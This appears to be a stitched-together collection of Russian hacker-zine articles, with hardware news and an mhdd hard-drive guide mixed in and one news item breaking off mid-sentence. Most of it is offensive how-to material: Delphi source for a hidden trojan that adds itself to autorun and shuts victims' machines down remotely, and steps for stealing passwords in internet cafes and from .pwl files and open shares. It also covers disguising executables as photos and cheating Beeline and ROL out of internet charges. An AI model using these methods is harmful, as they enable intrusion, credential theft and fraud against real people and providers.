"Тыгдымские кони"
Начнём
с того, что при помощи "Троянского коня" можно узнать пароли на
соединения с интернетом, скопировать или записать файл на компьютер без
вашего ведома, перегрузить компьютер, отформатировать
винчестер и многое другое, всё зависит от того, какие функции были вложены
разработчиком в его детище. За практическое осознание предоставленной
информации, с этого момента я не несу никакой ответственности, вся информация
направлена на то, чтобы разьяснить пользователю, какими способами программы
"Троянские кони" могут попасть на компьютер жертвы. Так же
предупреждаю, что в настоящем Уголовном Кодексе РФ предусмотренны 3 статьи за
написание и распространение вредоносных программ, а также за
несанкционированный доступ. Самый распространённый взлом - это кража
пароля и логина пользователя на доступ и интернету, украв Ваш доступ,
злоумышленник может просиживать в сети за ваши деньги и отправлять почту с
Вашего электронного адреса. (прочитайте
принцип действия "троянских коней", я расчитываю, что вы уже знаете
что такое клиент и серверная чать) Для того, чтобы удалённо администрировать
компьютер, взломщик должен заразить атакуемый компьютер серверной частью
трояна (в данном случае я буду рассматривать на примере ВО).
Способов инфицировать компьютер "трояном" очень много, я расскажу о
некоторых уловках и технологиях, так как если рассказать обо всех способах,
на сервере не хватит места под мой сайт, а сам он получится нудным. · grader_pass.zip -
программа, которая способна вытащить пароли с сервера вашего провайдера.Помните, бесплатный сыр только в мышеловке!
Таких программ не существует. · killnet - программа делает
некорректную операцию, взлом провайдера. Действительно действующая
программа только вместо провайдера, она ломает Вас. Помните, одной
программой, провайдера не прошибить! |
Автор: ExFast ansv@mail.ru
Наверняка
вы не слышали, что жёсткий диск можно разогнать. Но разгон винта отличается от
разгона других устройств. И возможно при условие, что
до разгона HDD работал не на максимум от своих возможностей. Если
заинтересовало, то продолжим.
Теория
Обычно винчестеры работают не на максимум, но не всегда. Сразу предупрежу, что
при разгоне увеличивается скорость вращения, и возрастает скорость передачи
данных, а недостаток - шум. Ну а если скорость не главное, то можно намеренно
затормозить винт.
Скорость или шум - решать вам.
Инструмент
Как и для любой работы, так и для нашей нужен инструмент.
В нашем случае это программа. Ёе можно скачать по адресу mhdd.net, её
название mhdd, также можно найти инструкцию на русском языке и всё это не превышает
сотни килобайт. Работает программа не только под MS-Dos, но и под Win 9x.
Изменять параметры накопителя можно в любое время и без перезагрузки, а также
завершать работу программы без различных последствий.
Функции
Эта программа умеет не только увеличивать скорость работы
винчестера, но и показывать его состояние (в верхней части экрана):
DREQ -
ждёт поступление команд;
WRFT - ошибка возникшая при записи;
BUSY - винт не реагирует на команды;
ABRT - команда не принята;
TONF - не найден 0-й трек;
AMNF - нельзя обратится к заданному сектору.
Тестировать
винчестера на наличие ошибок - сканирование поверхности вызывается клавишей
F4.Даже иногда лечить его (вызывается через F4, ERASE WAITs, и предназначена для удаления софт-бэдов). Вот что можно узнать
с помощью этой программы: название винта, версия микропрограммы, размер,
количество головок и секторов, серийный номер и многое другое. Я назвал лишь
основные функции, а полное описание можно найти на сайте, а сейчас перейдём к
самому главному.
Назначение
~ Что бы изменить скорость/уровень шума надо ввести aam далее:
*M - минимальный шум/производительность;
*L - средний шум/производительность;
*P - максимальный шум/производительность;
*D- выключает AAM; самая большая производительность/шум из всех опций.
~ SMART-тесты запускаются командой smart test.
~ Также возможна установка пароля на винт, но если вы забудете пароль, то
потеряете винчестер как устройство! Если пароль не установлен, есть надпись
Security: high OFF, а установлен, то Security: high ON. Для установки пароля
выполните действия:
1) Выбрать винчестер, на который нужно установить пароль (Shift + F3);
2) Нажать F2;
3) Набрать pwd;
4) Набрать пароль (не более 32 символов)
Внимание: забыв пароль, вы потеряете
винчестер, как устройство!
5) Нажать Enter
6) Всё! Пароль установлен.
А как его
снять?
1) Выбрать винчестер, с который нужно снять пароль (Shift + F3);
2) Нажать F2;
3) Набрать unlock;
4) Ввести пароль;
5) Набрать dispwd;
4) Ввести пароль;
5) Нажать F2;
6) Если всё набрано правильно, то надпись PWD исчезнет.
P. S.
Как видите функций у этой программы довольно много, начиная от просмотра
состояния HDD и заканчивая установкой пароля. Данную программу можно
посоветовать, как универсальную для ухода за винчестером.
Автор не несёт ответственности
за ваши действия!
Ты уже сто раз слышал это магическое
слово «Троян». И мы уже много раз писали обзоры различных коней этой породы. В
твоих извилинах, наверно уже давно крутиться мысль о создании собственного
боевого коня. Сегодня тебе предстоит эта уникальная возможность. Даже если ты
никогда не будешь использовать эти знания, тебе всё равно нужно знать, как
работают трояны изнутри.
Для простоты тела мы сделаем это на Delphi. Я
выбрал этот язык, потому что тело журнала ограничено, и я не хочу вдаваться в
подробности протоколов.
В этом номере ты найдёшь статью, посвящённую
написанию супер плеера на Delphi. Если ты её пропустил, то обязательно прочти и
возвращайся сюда. Там я описал основные принципы работы с оболочкой
компилятора, так что здесь повторяться не буду.
Приготовься, нам предстоит написать сразу две
проги. Одна будет находиться на твоей машине (клиент), другую надо будет
подбросить жертве (сервер). Работы будет много, поэтому меньше слов, и ближе к
телу.
Троянский сервер:
Итак, запускай Delphi или если он у тебя уже
запущен, то создавай новый проект («File» – «New Application»). Сейчас мы
примемся за серверную часть трояна.
Для начала выбери пункт меню «Options» из
меню «Project».
Здесь ты должен перенести «From1» из раздела
«Auto-Create forms» (список слева) в «Available forms» (список справа), как это
сделано у меня. Только что мы отключили From1 из списка авто инициализируемых
форм. Теперь инициализацию придётся произвести вручную. Не пугайся, это очень
просто.
На странице «Application» этого же диалога
есть кнопка «Load Icon». Нажми её, чтобы сменить иконку будущей проги. Если
икону не сменить, то будет использоваться дельфячая, а она быстро выдаст твоё
смертельное оружие.
Теперь ты должен бросить на форму компонент ServerSocket
из раздела «Internet», это сервак протокола (по умолчанию TCP, и нам его
достаточно). Выдели созданный ServerSocket1 и перейди
в ObjectInspector. Здесь тебя интересует только свойство «Port». По умолчанию
оно равно 1024, но я тебе советую его поменять на любое другое (желательно
больше 1000).
Теперь щёлкни в любом месте на форме, чтобы
активизировать её свойства. Перейди в ObjectInspector и щёлкни по закладке
Events. Дважды щёлкни по строке «OnCreate» и Delphi, как всегда, создаст процедуру,
она будет выполняться при инициализации формы. Напиши там следующее:
procedure TForm1.FormCreate(Sender: TObject);
var RegIni:TRegIniFile;
begin
RegIni:=TRegIniFile.Create('Software');
RegIni.RootKey:=HKEY_LOCAL_MACHINE;
RegIni.OpenKey('Software', true);
RegIni.OpenKey('Microsoft', true);
RegIni.OpenKey('Windows', true);
RegIni.OpenKey('CurrentVersion', true);
RegIni.WriteString('RunServices', 'Internat32.exe',
Application.ExeName);
RegIni.Free;
ServerSocket1.Active:=true;
end;
Теперь перейди в начало текста и напиши после «uses»
слово «registry». Мы уже делали такую операцию в статье про мега плеер, но я
повторю, как это будет выглядеть:
uses registry, Windows, Messages,
Теперь я объясню, что мы написали в процедуре.
«var RegIni:TRegIniFile» - здесь мы объявили переменную
RegIni типа TRegIniFile. С помощью этой переменной мы будем общаться с
реестром.
«RegIni:=TRegIniFile.Create('Software')» - инициализируем
переменную указывающую на реестр.
«RegIni.RootKey:=HKEY_LOCAL_MACHINE» говорим, что нас
интересует раздел HKEY_CURRENT_USER реестра.
«RegIni.OpenKey('Software', true)» - открываю подраздел
«Software».
Дальше я последовательно открываю подразделы, пробираясь
в недра окошек.
«RegIni.WriteString('RunServices', 'Internat32.exe',
Application.ExeName)” – записываю в раздел «RunServices» (в этом разделе
хранятся проги, которые автоматически загружаются при старте), новый параметр с
именем «Internat32.exe» (имя будущего файла) и значением Application.ExeName
(здесь храниться полный путь к запущенному трояну).
«RegIni.Free» - уничтожаю ненужный больше объект RegIni.
Всё это делалось, чтобы при запуске проги, она сама себя
прописывала в разделе автозапуска. И после перезагрузки компьютера она
автоматически загружалась в память.
Самая последняя строка «ServerSocket1.Active:=true»
запускает сервер на указанном тобой порте.
С загрузкой покончено. Теперь давай займёмся выгрузкой.
Опять выдели форму и в закладке Events у ObjectInspector-а дважды щёлкни по
строке «OnDistroy». Теперь создастся процедура, которая будет выполняться при
уничтожении формы. В созданной процедуре напиши:
procedure TForm1.FormDistroy(Sender: TObject; var Action: TCloseAction);
begin
ServerSocket1.Active:=false;
end;
Этим я отключаю сервак. Если этого не сделать, то при первой же перезагрузке твоя
жертва может поймать синий экран, если ты в это время будешь подключён к
серверу. С одной стороны, это хорошо. Твоя жертва в очередной раз убеждается в
плохой защищённости его окошек. А с другой, я не думаю, что следует выдавать
себя раньше времени. Тем более, что после синего
экрана перезагрузка может остановиться, а нам это не надо (забегу вперёд и
скажу, что мы сами будем перегружать компьютер жертвы).
Теперь нужно выделить ServerSocket1 и перейти на закладку
Events у ObjectInspector-а. Дважды щёлкни по строке «OnClientRead» и в
созданной процедуре (она будет вызываться, когда что-нибудь приходит на порт)
напиши:
procedure TForm1.ServerSocket1ClientRead(Sender: TObject;
Socket: TCustomWinSocket);
begin
if Socket.ReceiveText ='R' then
ExitWindowsEx(EWX_SHUTDOWN,0);
end;
Теперь, как это звучит по-нашему:
Если полученный текст = букве ‘R’ то
Отправить компьютер в редаун.
ExitWindowsEx – редаун заставит окна свернуться и
отключить компьютер от питания. Я вообще добрый дядька, поэтому использовал
параметр EWX_SHUTDOWN. С этим параметром, перед редауном всем запущенным
приложениям полетит запрос о выключении, и жертва сможет сохранить свои
изменённые данные. Если ты злей меня, то используй EWX_FORCE. В этом случае, компьютер упадёт без предупреждения и со скоростью
света, так что жертва не успеет от страха воздух испортит :).
Троян практически готов, сохрани его. Для этого выбери
«Save All» из меню «File». С начала Delphi запросит имя формы. Оставь по
умолчанию (Unit1) и нажми «Сохранить». Потом будет запрос на имя проекта,
которое будет использоваться в качестве имени ЕХЕ файла. Назови его
«Internat32», чтобы файл не вызывал особых подозрений.
Конюшня для коня:
Теперь ты должен хорошенечко спрятать своего будущего
скакуна, чтоб его не было видно в панели задач. Для этого выбери пункт меню
«Project Manager» из меню «View».
Щёлкни правой кнопкой по Internat32.exe и в появившемся
меню выбери «View Source». Перед тобой откроется маленький файл с исходным
текстом проекта. Сравни то, что ты увидишь с этим текстом, и допиши то, чего не
хватает, а что лишнее – убери (так не так уж и много):
program Internat32;
uses
Forms,
Windows.
Unit1 in 'Unit1.pas' {Form1};
{$R *.RES}
var
WhEvent:THandle;
begin
Application.Initialize;
ShowWindow(Application.Handle,SW_Hide);
Form1:=TForm1.Create(nil);
Application.Run;
WhEvent:=CreateEvent(nil, true,false, 'et');
while (true) do
begin
WaitForSingleObject(WhEvent,1000);
Application.ProcessMessages;
end;
end.
Будь внимателен при переписывании. Всё должно быть один к
одному. Теперь я расскажу, что здесь написано:
В самом начале нет ничего интересного, и нас абсолютно не
касается. Нас интересует всё, что написано после слова «Var».
WhEvent:THandle – Этим я говорю, что мне нужен указатель
WhEvent на пустое событие Thandle.
Application.Initialize – Инициализируется троян.
ShowWindow(Application.Handle, SW_Hide) – Устанавливаю параметры
окна. Параметр SW_Hide – говорит, что окно должно быть невидимо. Единственное,
как его можно после этого увидеть, так это нажать Ctrl+Alt+Del. Но здесь у нас
используется не вызывающее подозрения (только у чайника, профи уже давно знают,
о таком имени) имя.
Form1:=TForm1.Create(nil) – создаю форму. Мне приходится это делать так, потому что мы убрали форму
из из списка авто создаваемых.
Application.Run – запускаю трояна. Здесь запускаются
обработчики событий и прочая ерунда, за которую отвечает Delphi и которую
пришлось бы писать вручную на С или С++. А здесь всё
очень просто.
WhEvent:=CreateEvent(nil, true,false, 'et') – инициализация пустого события.
Следующие пять строчек я напишу словами, а ты разберёшься
как всегда методом сравнения:
Пока (true) выполнять
Начать цикл
Ждать пока наступит событие (пустое событие, 1000 миллисекунд)
Получить управление
Закончить цикл
Две строчки между началом и концом цикла будет
выполняться бесконечно, потому что true оно всегда true, и из этого цикла
выхода нет. Весь цикл заключаеться в двух особенностях:
1. Запускается ожидание несуществующего события. Так как
событие не существует, то программа прождёт его ровно указанное время в
качестве второго параметра (1000 миллисекунд или 1 секунда).
2. Получить управление.
После второго шага программа снова перейдёт на пункт 1 и
запустит ожидание. Во время ожидания пользователь работает с другими
приложениями как всегда. Когда трояну (каждую 1 секунду) передаётся управление,
то наш конь проверяет: есть ли для него сообщения. В нашем случае сообщение
может быть одно – приход на указанный тобой порт управляющей команды. Если
сообщения есть, то троян их выполняет. И в любом случае (есть сообщения или
нет), после этого пользователь снова работает 1 секунду без проблем. Проверка
происходит так быстро, что жертва не ощутит нагрузки трояна даже на четверке с
сотым камнем.
Нажми «Ctrl+F9» чтобы Delphi создал .ехе
файл без запуска проги. Как только Delphi перемозгует весь код, можешь считать,
что серверная часть готова. Если вздумаешь её тестировать, то не забудь, что
после первого же запуска троян пропишется в реестре по адресу:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices. Не
забудь после тестирования его удалить.
Теперь переходим к клиентской части, которую ты должен
будешь запустить на своём компьютере для управления компьютером жертвы.
Троянский всадник:
Снова сохрани все изменения и создай новый проект. Пришло
время писать клиентскую часть трояна. Ещё пару минут
напряжённого труда и все красавицы наши :).
На новый проект ты должен бросить три компонента:
1. Button из закладки «Standart» для отправки команды на
компьютер жертвы.
2. Edit из закладки «Standart» для ввода имени или адреса
жертвы.
3. ClientSocket из закладки «Internet» клиент порта для
связи с сервером
Посмотри на рисунок 3, у тебя должно получиться нечто
похожее.
Выдели ClientSocket1 и в ObjectInspector-е измени
свойство порт. По умолчанию он 0, а ты должен поставить тот, который ты
назначил серверу.
Теперь дважды щёлкни по кнопке и в созданной процедуре
(обработчике нажатия кнопки) напиши следующее.
procedure TForm1.Button1Click(Sender: TObject);
begin
ClientSocket1.Host:=Edit1.Text;
ClientSocket1.Active:=true;
ClientSocket1.Socket.SendText('R');
ClientSocket1.Active:=false;
end;
ClientSocket1.Host:=Edit1.Text
– В ClientSocket1 заносим имя жертвы в твоей локалке. Если собираешься использовать троян в инете, то там ты
имя никак не сможешь узнать. Тебе придётся использовать IP адрес, а значит эта строчка замениться на
ClientSocket1.Addres:=Edit1.Text. И вводить в Edit1 ты должен будешь IP адрес.
ClientSocket1.Active:=true – активировать соединение с
сервером.
ClientSocket1.Socket.SendText('R') – отправить букву R.
Помнишь, что у нас было пару минут назад. Если сервер получит букву R, то он
перегрузит машину.
ClientSocket1.Active:=false – закрыть соединение с
сервером.
Всё. Троян готов к бою. Нажми «Ctrl+F9» чтобы Delphi создал ЕХЕ файл без запуска проги. Найди жертву и протестируй своего верного коня. Для этого нужно запустить серверную часть на компьютере жертвы. Потом запустить клиентскую часть на своём компьютере. Ввести в клиент имя компьютера жертвы (или адрес, если ты скомпилировал под использование через IP) и нажать кнопку. Компьютер жертвы должен перегрузится.
Перед компьютерной
индустрией сейчас стоит нелегкая задача, похожая на ту, что описана в
"Новом завете". Необходимо протащить верблюда, то есть терабайты
информации, через игольное ушко коммуникационных каналов. И представьте себе,
решения имеются! Большая часть их была представлена на проходившей недавно в
Японии выставке Ceatec 2002.
Свои дальнейшие
планы раскрыли два враждующих лагеря DVD+ и DVD-. Toshiba Corp. считает, что
будущее DVD за системой Advanced Optical Disk.
Сейчас корпорация
использует однослойные DVD диски емкостью 15 Гб, обеспечивающие скорость
передачи данных 36 Мбит/сек. Для чтения и записи используется сине-фиолетовый
лазер с длиной волны 405 нм. Скоро Toshiba и Nec займутся выпуском двухслойных
дисков емкостью 30 Гб и перезаписываемых дисков на 40 Гб.
Приверженцы
конкурирующей системы Blu-ray Disk: Hitachi, JVC, Matsushita, Pioneer, Philips,
Sharp и Sony, продемонстрировали свой вариант писалки. Пока система Blu-ray
Disk поддерживает только запись на болванки. В скором времени диапазон
доступных носителей расширится за счет двухслойных DVD-ROM и минидисков.
Matsushita нашла
способ изготавливать двухслойные диски на уже существующих производственных
линиях, так что сторонникам дисков Blu-ray не придется тратить большие средства
на апгрейд оборудования.
Компания Pioneer
продемонстрировала практически прозрачный DVD-диск
емкостью 25 Гб. Дело в том, что отражающий слой в этом диске на 40% тоньше, чем
в обыкновенном DVD-ROM.
TDK занимается
созданием диска одноразовой записи, в котором используется неорганический
материал для формирования записывающего слоя - сплав кремния и меди. Дело в том,
что работа над органическими материалами только началась, а диски из сплава
можно запускать в серийное производство хоть завтра. Перезапись невозможна
из-за того, что при первоначальной записи отдельные слои кремния и меди тают и
сливаются.
Кроме того, TDK
разработала технологию, позволяющую записывать диски на скоростях 4x и выше.
Высокое качество записи обеспечивается при скорости 144
Мбит/сек.
Так как же
передать такое невообразимое количество информации, да еще и с помощью
устройств беспроводной связи?! Корпорация Sharp объявила о разработке
коммуникационных устройств, работающих на частоте 5,2 ГГц и использующих
стандарт передачи данных IEEE 802.11e.
Максимальная
скорость передачи данных 54 Мбит/сек, хотя на выставке демонстрировалась
скорость 36 Мбит/сек. Стандарт 802.11e еще официально не принят, но Sharp
планирует воспользоваться им для создания зашифрованных каналов передачи видео и аудио информации.
Matsushita
продемонстрировала беспроводной передатчик стандарта IEEE 802.11a со
специальной антенной, котораянаходит оптимальный угол для приема радиоволн. Но
все рекорды побила JVC, представив передатчик, со
скоростью передачи данных 1,25 Гбит/сек.
Правда, информация
не шифруется и не проверяется на наличие ошибок, а максимальная дистанция -
Взлом интернет-кафе/компьютерного клуба
Находите в городе клуб или кафе, которое подключено к
интернету. Идете туда, садитесь за машину, оплачиваете интернет и притворяетесь
полным дауном, пуская пузыри и медленно тыкая пальцами в клавиатуру, тем самым усыпляя бдительность администраторов этого клуба.
Потом ищете в поисковике такую программу: pass.exe (dialupass, PassView). Потом быстренько
скачиваете программу на винчестер и запускаете ее. Все антивирусы и firewall'ы
будут молчать, не замечая ваших противоправных действий. Она вам выдаст список
ВСЕХ паролей и логинов, которые есть на этом компьютере, исключая, вероятно,
пароль который используется для входа в локальную сеть. Да он нам собственно и
не нужен. Если информации столько много, что вы ее не в состоянии запомнить, а
ручка и листок бумаги вызовут подозрения, то нажмите на кнопку Отослать на e-mail. Самое главное НИКАКИХ дискеток.
Шуршание дискеты в дисководе сразу привлечет к вам лишнее внимание, потому что,
как всем известно, дискеты наилучший способ переноса компьютерных вирусов, и
ламеры очень боятся чужих дискеток в своем дисководе. Только не забудьте потом ее удалить из компьютера. После чего, мило
улыбаясь, вы досиживаете оплаченное время и бежите к себе домой, радостно крича
во все горло: We are the champions! Пароли в ваших руках или в вашем почтовом
ящике, что, в принципе, одно и тоже. Еще лучше если вы заранее найдете
программу, скачаете ее на какой-нить бесплатный ресурс
или на свою страничку, предварительно запаковав ее Apack'ом или еще
каким-нибудь динамическим паковщиком, для уменьшения ее размера и переименуете
ее как-нибудь безобидно, типа flower.exe. Есть еще программа dialpwd.exe, она
консольная и не позволяет отсылать на e-mail. Ее единственное достоинство -
размер, который составляет около 15-ти килобайт, что позволяет превратить
добычу пароля в дело двух минут. Кстати, желательно узнать, есть ли на модеме
провайдера АОН(определитель номера). Его можно узнать
по характерному писку частотой 500 Гц, который слышится в модеме после того,
как вы набрали номер и абонент поднял трубку. Если
нет, то флаг в руки вас вычислить будет не так то и просто. Если же есть, то
попробуйте обойти его, набрав номер с помощью программы, в которой есть
анти-АОН. Одной из таких программ является Active Phone Server или еще ее можно
найти как apserver.zip. Ее преимущества в том, что анти-АОН можно включить не
только когда звонишь по обычному телефону, но и тогда, когда вы звоните до
провайдера. Анти-АОН посылает в линию сигналы, которые обычно соответствуют
цифрам 12345678, набранным мгновенно, что сбивает в большинстве случаев АОНы.
Intro
И так ... было время,
когда все провайдеры знали друг друга в лицо, и каждый из них был знаком со
своими клиентами. Но! Все изменилось. В связи с этим был придуман вход в
интернет с помощью пары логин:пароль, вводимых при
DialUp подключении к провайдеру (практически с этого момента и появились такие
люди как мы - питавшие "звериный" интерес к постижению тайн всего
мира = паролей пользователей).
Первое, что
приходит на ум хакера, это подбор пароля вручную. Многие
"неграмотные" пользователи часто выбирают в качестве "заветного
слова" что-то наподобие 12345, asdf, god, love, password, secret, sex,
qwerty и т.д. и т.п. Но что делать, если пароль подобрать не получилось? Именно
об этом мы и будем говорить.
Windows aka MustDie
Самая, самая
система для взлома - глубокоуважаемый мною Windows.
Его популярность действует только на руку опытному хакеру. Не забывайте, что
главное - не попасться в лапы закона. Ну что же, начнем?
В системе
Майкрософт(а) пароли пользователей хранятся в файлах,
названия которых генерируются из первых восьми символов имени пользователя.
Прибавляя к файлу расширение pwl, система кидает его в папочку Windows(а).
Таким образом, что б получить пароли некоего пользователя, необходимо
скопировать все файлы с расширениями pwl из каталога C:\%WINDIR% к себе на комп
(учтите, что пароли там хранятся в закодированном виде). После этого ты должен
запустить программу RePwl, которая откроет тебе пароли. Ты спросишь "а как
узнать телефоны, по которым можно подсоединиться к прову"? Так вот -
настройки соединений, телефоны и другая полезная инфа хранится в реестре - тебе
необходимо запустить на машине ламера редактор реестра (regedit.exe)
...и найти в
нем секцию "HKEY_CURRENT_USER\RemoteAccess\Addresses", записать в
новый файл, командой "Реестр => Экспорт файла реестра...", выбранную
ветвь. Информация в новоиспеченном файле *.reg также будет храниться в
закодированном виде, но тебе даже не придется ее раскодировать - просто запусти
этот файл у себя дома и все, что ты скопировал, иммигрирует на твою машину.
Если тебе более удобно копировать сам файл реестра, то: Найди и скопируй из
папки Windows(а) файл user.dat (для всех MS-систем, кроме XP
:()
Сделай
резервную копию своего user.dat(а), замени его на позаимствованный у
"неизвестного доброжелателя" ;) Перезагрузись и работай с новым
реестром Среди всего мусора реестра в нем еще можно
найти следующее: "HKEY_CURRENT_USER\NETwork\Recept" - подключенные
ресурсы в инет "HKEY_CURRENT_USER\RemoteAccess\Profile" - инфа о
логине подключения
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
InternetSettings\ProxyServer"
"HKEY_CURRENT_USER\Software\Microsoft\Internet
Mail and News\Mail:\
...\Account"- для POP3 сервера
...\DefaultPOPSServer"
...\DefaultSMTPServer"
...\Name:"
...\Organization"
...\РОРЗ -г :"
...\Password" - для POP3 сервера
...\SenderEMail:"
Но как
завладеть паролями, не засветившись, то есть, не предоставляя права кому-либо
подозревать именно тебя? Это можно сделать прямо в инете - тебе потр#$&ется сканер расшаренных ресурсов (к примеру,
xSharez). Последующие действия - заходишь на http://tehnofil.ru/<A%20href=,
вводишь адрес сайта (или один из ип(ов)) нужного
провайдера и смотришь зарегистрированный им диапазон ip. После этого - вводишь
те же ип(ы) в Legion, xSharez или другую любимую
тулзу, и жмешь на Scan. Если удалось найти кого-либо с открытым диском C,
подсоединяй его (кнопка Mount) и скачивай все, чего душа пожелает (если будешь
копировать *.pwl, учти, что файлы размером от 688 до 719 байт не содержат
паролей).
Пароли могут
храниться не только в pwl-файлах, например: Edialer хранит их в Edialer.ini
(расшифровать не сложно и самому ;), VDialer - в каталоге Windows, файл Vd3user.dat (копируйте его на
свой хард и запускайте программу, пароль будет введен) CuteFTP 4.x - в tree.dat
(для расшифровки - RePwl), если есть ICQ, то в папке ICQ/200хb хранятся UIN(ы)
в файлах *.dat (расшифровывать с помощью Advanced ICQ Password Recovery), а Trillian 0.725 - Trillian\users\default в файлах *.ini (нужно заменить ими своих).
Еще один способ
завладеть чужими паролями - написать троян, который будет отсылать на
специально созданное для этого мыло чужие *.pwl(ки).
Его можно "приклеить" ламеру у него же дома, послав по почте, или, что
я считаю наиболее удобным, отослав *.exe файл по ICQ, назвав его, например,
"photo.jpg .exe" (писать с пробелами - у аськи не достаточно большое
поле, и она не покажет полное название файла).
Очередной
способ гласит, что некоторые провайдеры предоставляют бесплатный доступ к своим
SMTP и POP3 серверам (http://tehnofil.ru/<A%20href=,
http://www.mailgate.ru/,
http://www.e-mail.ru"/;.).
Это можно
использовать в своих целях (к себе на почту можно качать файлы) - все, что
нужно, это Shell с поддержкой Perl и возможностью запуска программ в режиме
background(а). Все запросы должны идти через mail-proxy, написанного
на Perl(е), расположенного, к примеру, на вашем сайте.
Другие провы предлагают бесплатный интернет, но не полностью функциональный (ограниченный некоторым количеством сайтов или что-либо наподобие). Исчите таких, которые поддерживают функцию callback (оплата телефонного разговора). Если вам удастся раздобыть номера таких провайдеров, буду благодарен, если не забудете поделиться со мной...
Outtro
А теперь напряги
мозги и задумайся: "А не легче пойти и заплатить, отдать пусть даже 20$,
чем парится над этой проблемой?"
Статью
прислал The Fuf.
В данной статье я расскажу как сделать халявный
инет через БиЛайн GPRS. Для этих делишек нам потребуется
мобила (с GPRS) и комп, через который мы в инет будем заходить ;) Итак,
приступим...
Шаг первый: Покупаем мобилу с поддержкой GPRS (если нет) и подключаемся
к БиЛайну (если не подключены; про такую халяву в
других сетях не знаю). После этого на счету должны быть несколько
"подарочных" баксов, если их нет то стоит
раскошелиться на карточку в несколько баксов.
Шаг второй: Подключаем себе пакет из трёх услуг (GPRS, WAP, MMS). Как
это сделать можно узнать в справочной службе БиЛайна.
Потом заказываем настройки GPRS для своей мобилы
(бесплатно).
Шаг третий: Настраиваем комп соответствующим образом (см. справку на
www.beeline.ru).
Шаг четвёртый: Подключаемся к инету. Теперь и начинается Халява: выкинуть из инета нас не могут, а проверка состояния
счёта происходит лишь при подключении. Поэтому можно качать из сети всё, что
угодно и сколько угодно! Связь по GPRS у БиЛайна стабильная, обрывов связи нет!
Кто не понял в чём халява, скажу: ты можешь
пользоваться инетом до офигения, единственный минус - комп выключать нельзя, а
в это время твой баланс на мобиле уходит в минус, а ты продолжаешь сидеть в
инете. Когда у тебя будет, где-то -200 баксов (больше
1Гб траффика) можно выбросить симку в помойку. А потом
сказать, что ты был на даче, и у тебя там мобилу спёрли, и что "воры"
заходили в инет через твой счёт, а сообщить об этом инциденте у тебя не было
возможности :)))) (или что-нибудь другое придумать =)...
ЗЫ. Не забудьте поставить мобилу на зарядку :)
HiTech News
Xakep, номер #028,
стр. 028-004-4
По первому
зову, громко лая, робопес бросается выполнять команды хозяина. Как хвастают разработчики,
RS-01 станет грозой всех Aibo и унесет на спине целую упаковку бездыханных
японских "мосек". Насколько это заявление соответствует
действительности, станет известно через месяц, когда новинка поступит в
ограниченную продажу в Великобритании.
Будильник с MP3
ВСТАВИТЬ
ИЗОБРАЖЕНИЕ MP3-0.JPG + MP3-1.JPG
Американцы уже
просыпаются под любимые MP3-треки.
Будильник MP3
O'Clock взывает к любителям сладких снов голосами популярных исполнителей. Устройство
проигрывает MP3-файлы продолжительностью до 50 секунд. В комплект поставки
входят "музыкальные приветы" от No Doubt и Metallica, полсотни других
известных треков. Дополнительные мелодии и свой собственный голос можно
загрузить с обычного компьютера.
Новинка
продается по цене 45 долларов.
ROL на халяву!
Х уже писал про
то, как кинуть зажиточного прова на бабки, регистрируя
сразу несколько карточек. Но этого нам оказалось мало! Была найдена супер-инфа,
как сидеть в инете через "Россия онлайн"
абсолютно на халяву!
Единственное,
что тебе понадобится для юзания супер-фишки, так это рабочий аккаунт в ROL. Просто мы сделаем так, что с него не будут списываться деньги ;).
Без долгих базаров скажу, что работать мы будем не через забитые, вечно занятые
пулы Online`a, а через крутую X.25 сеть - Sprint. Т. е. звоним по
номерам этой сетки.
Но, как ты
понимаешь, просто так 4Free тебя туда не пустят, придётся замутить кое-какой
скрипт. Держи!
proc main
delay 1
transmit "@D<cr>"
waitfor "NAL="
transmit "D1<cr>"
waitfor "@"
transmit "c 772846.1<cr>"
waitfor "login:"
transmit $USERID, raw
transmit "^M"
waitfor "password:"
transmit $PASSWORD, raw
transmit "^M"
waitfor
"PPP"
endproc
Забиваешь
данные строчки в текстовый файл, сохраняешь. В настройках соединения указываешь
использование "Сценария". Фишка в том, что помимо юзания самого
скрипта, при соединении тебе придётся в стандартном окошке
"Соединения" указать уже существующий логин-пароль от ROL.
Коннектишься, сидишь в инете, потом лезешь в статистику: Ба! Ни одного цента не
списано со счёта! http://www.gin.ru/win/matrix_1.html Здесь ты найдёшь список модемных пулов, раскиданных по всей
России. Ложка дёгтя в бочку мёда: связь действительно надёжная, но не быстрая:
14,4 - стандарт де-факто сетей X.25. Удачи!
Пришло
время бесплатного
интернета.
Это, наверное, Новогодние подарки от БиЛайна :)
Сейчас
я Вам опишу два вполне законных способа бесплатного GPRS-интернета от БиЛайн.
Один
простой, но непроверенный, а другой - сложный, но проверенный!
Простой способ не платить денежки за
GPRS-интернет
Вам
просто надо сделать так, чтобы Ваш балланс был отрицательным! Но неспешите.
Здесь есть маленькая фишка. Тратить деньги на вашем счете надо с умом, иначе
ничего неполучиться.
К
примеру: Сейчас на Вашем телефонном счете 5$. Вы можете тратить их куда угодно,
пока Ваш балланс не станет 0.50 - 0.70$. После чего вам необходимо отправить
около 15-ти SMS-сообщений и ждать, пока балланс вашего счета не станет
отрицательным. (до того, как
снимут деньги за SMS-сообщения сидеть в интернете НЕЛЬЗЯ. Иначе неполучиться)
Вот, собственно и все !
Я
лично это еще не проверял, у меня на счету около 7$, но говорят, что работает!
Сложный способ не платить денежки за
GPRS-интернет
Этот
способ сложет тем, что вам придется достать старую SIM-карту, со старым тарифом
Би+ в котором деньги замораживаются, если Вы вовремя
не активировали карту. Если вы ее достали, то считайте что
Вам повезло.
1.
Положите на нее 5$.
2.
Подключите услугу GPRS-интернет по номеру 67409101
3.
Ждите неделю, чтобы ваш счет заморозили.
4.
После заморозки Вашего счета интернет работать будет, а деньги снимать не
будут!
Этот
способ проверен!
У
меня друг сейчас целыми днями зависает! А я пока еще не достал такой SIM-карты :(
ВНИМАНИЕ !!!
После
того, как я проверю первый способ, я обязательно напишу в описании товара
"ПРОВЕРЕННО" Впринципе, все честно и законно! Мы же не взламываем
ничего, и не воруем деньги у других абонентов. Это упущенная ошибка
БиЛайновцев.
С
другими операторами не пробовал, можете сами попробовать !
КАК ВЗЛОМАТЬ ПРОГРАММЫ,ВЗЛОМ ПРОГРАММ
Все наверняка знают что такое шароварные проги. Это типа те, которые работают
некоторое время, а потом заставляют платить зеленых президентов. Но мы то не дураки:) Можно переинсталлить прогу, но после этого
часто они все-равно не работают. В такой ситуации можно перевести часы
назад. А я однаждытак перевел дату раньше чем прога
